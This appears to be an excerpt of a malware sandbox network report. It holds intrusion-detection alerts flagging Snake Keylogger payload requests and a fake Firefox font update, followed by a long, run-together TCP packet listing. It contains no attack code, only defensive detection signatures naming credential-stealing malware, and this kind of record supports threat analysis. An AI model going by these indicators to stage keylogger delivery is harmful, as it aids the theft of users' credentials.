2024-12-05T22:50:53.689614+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49910 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:53.706762+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49911 | 172.217.19.238 | 443 | TCP
2024-12-05T22:51:13.379912+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49965 | 13.107.246.63 | 443 | TCP
2024-12-05T22:51:18.717113+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49920 | 172.217.19.238 | 443 | TCP
2024-12-05T22:51:28.669036+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49996 | 13.107.246.63 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Dec 5, 2024 22:50:15.633549929 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.635548115 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.635559082 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.635828972 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.636009932 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.637129068 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.638720989 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.638746023 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.638981104 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.639242887 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.639590025 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.679327965 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.683327913 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524226904 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524312019 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524338007 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524390936 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524488926 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524525881 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524683952 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524749041 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524765015 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525213957 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525258064 CET44349739172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.525497913 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525759935 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525774002 CET44349739172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.539762020 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.539860964 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.539977074 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540011883 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.540153027 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.540256023 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540290117 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540488005 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540523052 CET44349740172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.540590048 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540780067 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540796995 CET44349740172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557121992 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557163954 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557224989 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.557243109 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557297945 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.557905912 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557939053 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.557987928 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.563141108 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.563165903 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.563635111 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.563673019 CET44349741142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.563899994 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.564109087 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.564122915 CET44349741142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823234081 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823287010 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823363066 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823364973 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.823554993 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.825366020 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.825383902 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.826812983 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.826855898 CET44349742142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.826922894 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.828969955 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.828983068 CET44349742142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.996042967 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:16.996078968 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.996182919 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:16.996671915 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:16.996681929 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.904877901 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.904947996 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.904947996 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:17.904984951 CET49742443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:17.905859947 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.905905962 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.905968904 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.906418085 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.906478882 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.906594038 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.907958031 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.907973051 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:17.908014059 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:17.908027887 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.723277092 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.723346949 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:18.727715015 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:18.727734089 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.727958918 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:18.737101078 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:18.779326916 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200638056 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200669050 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200680971 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200850964 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.200881958 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.200978994 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.378237963 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.378264904 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.378402948 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.378432035 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.378478050 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.461188078 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.461210012 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.461421013 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.461448908 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.461535931 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.559691906 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.559712887 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.559757948 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.559777021 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.559830904 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.595156908 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.595181942 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.595292091 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.595331907 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.595374107 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.604145050 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.604229927 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.604943037 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.604994059 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.605462074 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.605530024 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.606247902 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.606293917 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.613559008 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.613583088 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.613663912 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.613691092 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.613730907 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.635011911 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.635044098 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.635078907 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.635094881 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.635124922 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.635138988 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.659811974 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.659832001 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.660089016 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.660144091 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.663080931 CET49747443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.666668892 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.666697979 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.667047024 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.667099953 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.667624950 CET49746443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:19.707328081 CET44349747172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.715328932 CET44349746172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745596886 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745616913 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745681047 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.745697975 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.745740891 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.763139009 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.763160944 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.763283968 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.763324976 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.763458014 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.774297953 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.774316072 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.774370909 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.774386883 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.774429083 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.789084911 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.789104939 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.789144993 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.789160013 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.789194107 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.789212942 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.804085016 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.804106951 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.804167986 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.804235935 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.804852962 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.817202091 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.817229033 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.817282915 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:19.817295074 CET4434974513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.817331076 CET49745443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.392319918 CET49769443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.392333984 CET44349769142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410783052 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410830021 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410887957 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.410917044 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410931110 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410969019 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.411772013 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.411787987 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.412344933 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.412395000 CET44349770142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.412584066 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.412811995 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.412826061 CET44349770142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.655956030 CET49766443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.655987024 CET49767443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.656004906 CET49769443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.656033993 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.658260107 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.658288002 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.658464909 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.659353018 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.659368038 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.659854889 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.659903049 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.659986019 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.660202026 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.660217047 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.783472061 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.784055948 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.784084082 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.784569979 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.784579039 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.785644054 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.785929918 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.785954952 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.786266088 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.786271095 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788002014 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788255930 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.788263083 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788523912 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788580894 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.788584948 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788784981 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.788820028 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.789087057 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.789094925 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.792505980 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.792882919 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.792907000 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.793174028 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.793179035 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.217926025 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.217997074 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.218408108 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.218450069 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.218468904 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.218486071 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.218492985 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220069885 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220156908 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220290899 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.220344067 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.220344067 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.220362902 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220371962 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.222162962 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.222206116 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.222475052 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.222726107 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.222738981 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223242998 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223301888 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223426104 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223428965 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223448038 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223472118 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223476887 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223483086 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223484039 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223516941 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223521948 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223541021 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223596096 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223650932 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223665953 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223668098 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223686934 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223705053 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223711014 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.225733042 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.225770950 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.225862026 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.225924015 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.225934029 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.225982904 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.226039886 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.226054907 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.226131916 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.226142883 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232114077 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232182026 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232250929 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.232454062 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.232472897 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232486963 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.232491970 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.234658957 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.234688997 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.235574007 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.235696077 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.235713959 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.351557970 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.351680994 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.352216005 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.352365971 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.356343985 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.356358051 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.356662035 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.356723070 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.357145071 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.403338909 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.543704987 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.543895960 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.544471979 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.544540882 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.548288107 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.548316002 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.548648119 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.548712015 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.549046993 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.595335960 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.939117908 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.939646006 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.939995050 CET49776443192.168.2.513.107.246.63
